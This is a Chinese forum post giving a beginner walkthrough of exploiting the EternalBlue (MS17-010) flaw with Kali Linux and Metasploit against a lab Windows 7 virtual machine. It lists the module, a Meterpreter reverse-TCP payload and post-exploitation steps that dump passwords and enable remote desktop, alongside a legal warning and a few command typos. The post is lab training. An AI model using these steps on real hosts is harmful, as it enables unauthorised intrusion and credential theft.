×

【2022争霸赛*干货满满】kalilinux入门--利用永恒之蓝漏洞控制他人主机
  

无赖叫兽 2821

{{ttag.title}}
本帖最后由 无赖叫兽 于 2022-10-17 14:30 编辑

1、环境介绍

  需要在自己PC上安装vmware workstation,之后部署两台虚拟机,一台纯净版win7,一台kali linux。
win7的IP地址192.168.206.136,本机防火墙关闭;
Kali linux IP地址 192.168.206.135;

申明:需要搭建虚拟机做为靶机,不要找其他主机测试,即便是给客户好意做渗透也需要客户的书面授权书,切勿自行攻击或测试某个网站是否有漏洞,不然触犯网络安全法,面临的将是法律的严惩。

win7需要在https://msdn.itellyou.cn上下载的纯净版,这个网站里的所有操作系统镜像都是未打补丁的,并且不带第三方安全软件。2017年以前出的系统都可以,包括windows server 2018R2等,纯净版都会有永恒之蓝漏洞。

2、kali安装
访问www.kali.org网站


下载完解压

双击,加载,如果有报错,在Vmware workstation里右键该虚拟机,将操作系统改为liunx

启动后用户名和密码默认都是kali
进系统后点击如下图标可进入控制台


3、最强渗透工具 - metasploit
简称msf
Ctrl+shift+“+” 放大字符
Ctrl+”-”       缩小字符

输入msfconsloe进入msf管理界面


4、metasploit利用永恒之蓝漏洞攻击windows

先可以扫描下哪些端口开放,利用nmap集成工具


4.1 搜索模块

msf集成了上千个模块,第一步需要搜索模块,使用search ,搜索什么呢,你可以搜索永恒之蓝和漏洞编号,每一个漏洞,不论是CVE还是微软官方Microsoft也好,都会给定一个漏洞特定的编号,比如说永恒之蓝漏洞就被微软官方列为2017年第10个漏洞,所以编号命名为ms17_010,那有同学说,我怎么知道呢?可以在微软官方、github,百度等查阅漏洞编号。
我们search ms17_010


exploit打头的是攻击脚本,auxiliary是辅助脚本,是检测某个漏洞是否存在。

4.2 使用模块

搜索到了模块之后,使用use命令使用模块,use前面的序号号Name都可以,比如
use 0  或 use dxploit/windows/smb/ms17_010_eternalblue

4.3 设置模块

查看有哪些设置,使用命令show options或options


第一项是模块设置,name设置名,current setting设置项,required是否必选,description描述信息
首先需要与靶机网络相同,保证能ping通192.168.200.136

设置参数
set RHOSTS 192.168.206.136


再次查看配置

发现模块设置中的所有必填项已全部完成设置
再设置攻击载荷选项
最新版的payload的默认设置是对的,以前老版本设置是不正确的。老版本可以这样设置下:
set payload windows/x64/meterpreter/reverse_tcp
设置LHOST即监听地址,即本地地址,会自动生成,可以查看下


设置监听端口
只要是没被占用的端口都可以,可以自行设置,也可以使用默认的端口
比如set LHOST 60000
查看所有项均已设置完成


4.4 攻击

直接输入命令run即可,等待攻击结果


当出现meterpreter就表示攻击成功了。


以后再出现个新的漏洞就可以像这样攻击了。

4.5 后渗透攻击

meterpreter 是一个高级的,动态的,可拓展的Payload,出现meterpreter 我们就有了shell,可以执行非常多的命令,去操控远端设备。
执行命:?或者help,显示出可以执行的全部命令。


翻译这些英文description描述就可以知道这些命令具体是干什么的,
比如



比如:
获取主机信息


看下截屏图


抓取用户密码


成功获取到用户密码。

开启远程桌面
run post/windows/manage/enable_rdp

在靶机上看下,远程桌面已经被开启


里面集成的命令还有很多,大家可以查看描述信息的功能或百度一一测试。

5、总结

  这只是kalilinux的一个入门,触类旁通,再有其他漏洞我们就可以照样子测试了。我们攻击测试的目的在于加固主机,并不是为了攻击而攻击,攻击别人主机或网站是犯法的,特别是一些金融、国家机关类的网站。
  另外,有人问,对于没有漏洞或暂未发现漏洞的主机我们就不能攻击了吗?答案是很有可能。我们要想方设法找出漏洞,真找不出漏洞,我们还可以使用远程木马攻击,由于篇幅和时间问题,下次我们再更新一点这方面的入门。多谢大家!

打赏鼓励作者,期待更多好文!

打赏
暂无人打赏

339015 发表于 2022-10-18 00:04
  
感谢楼主分享,文章分享了利用kali系统进行简单渗透测试的一些实战案例,内容详实,图文并茂,期待更多优秀的分享
carson 发表于 2022-10-17 14:30
  
学习了,,不错,不错
无赖叫兽 发表于 2022-10-18 15:12
  
在客户这边无聊,自己再顶下!
发表新帖
热门标签
全部标签>
西北区每日一问
技术盲盒
安全效果
技术笔记
【 社区to talk】
每日一问
干货满满
新版本体验
产品连连看
GIF动图学习
技术咨询
2023技术争霸赛专题
功能体验
通用技术
秒懂零信任
安装部署配置
技术晨报
自助服务平台操作指引
每周精选
原创分享
标准化排查
排障笔记本
玩转零信任
深信服技术支持平台
POC测试案例
信服课堂视频
畅聊IT
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
云计算知识
用户认证
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
SDP百科
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
信服圈儿
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
排障那些事
高手请过招
升级&主动服务
高频问题集锦
社区新周刊
全能先锋系列
云化安全能力

本版达人

新手68983...

本周分享达人

零和一网络

本周提问达人